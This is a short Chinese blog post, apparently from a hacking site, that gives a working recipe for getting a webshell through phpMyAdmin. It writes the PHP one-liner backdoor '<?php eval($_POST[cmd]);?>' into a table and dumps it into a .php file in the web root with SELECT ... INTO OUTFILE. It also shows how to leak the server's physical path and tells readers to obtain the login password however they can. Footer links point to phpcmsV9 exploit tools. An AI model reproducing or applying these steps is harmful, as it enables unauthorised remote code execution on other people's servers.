mysql备份一句话

发表于 2012年08月22日
周边

很多时候我们拿到了PHPMYADMIN，现在如何利用PHPMYADMIN拿到WEBSHELL呢。有些朋友还不清楚。这里简要说一下：

利用PHPMYADMIN连上后，进入当前站点的数据库，然后建立一个表，名字可以随便写如cnyzy，但是字段数要写1，还要是TEXT类型的，以便于放入SHELL，创建成功了，点插入，写入一句话的木马：

<?php eval($_POST[cmd]);?>

1	<?php eval($_POST[cmd]);?>

，在点最左上角的SQL来执行SQL语句，在弹出的对话窗中输入:

"select * from 'cnyzy' into outfile "d:\\web\\data\\cnyzy.php";"

1	"select * from 'cnyzy' into outfile "d:\\web\\data\\cnyzy.php";"

意思就是说把CNYZY中的结果输入到路径的CNYZY.PHP文件中。然后这个小马就生成了。在用客户端一连就OK了。

很简单。还不明白的朋友可以试试。不过有一点是要注意的，就是要有绝对的路径地址。

1.如何拿到登陆密码. 自己想办法
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个Database.运行以下语句。

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');
select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php';
Drop TABLE IF EXISTS a;

Create TABLE a (cmd text NOT NULL);

Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');

select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php';

Drop TABLE IF EXISTS a;

4.如果没什么意外.对应网站得到webshell

标签：MySQL , shell , 一句话木马原文连接：mysql备份一句话 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

phpcmsV9任意读文件漏洞利用工具 Python版phpcmsV9自动写shell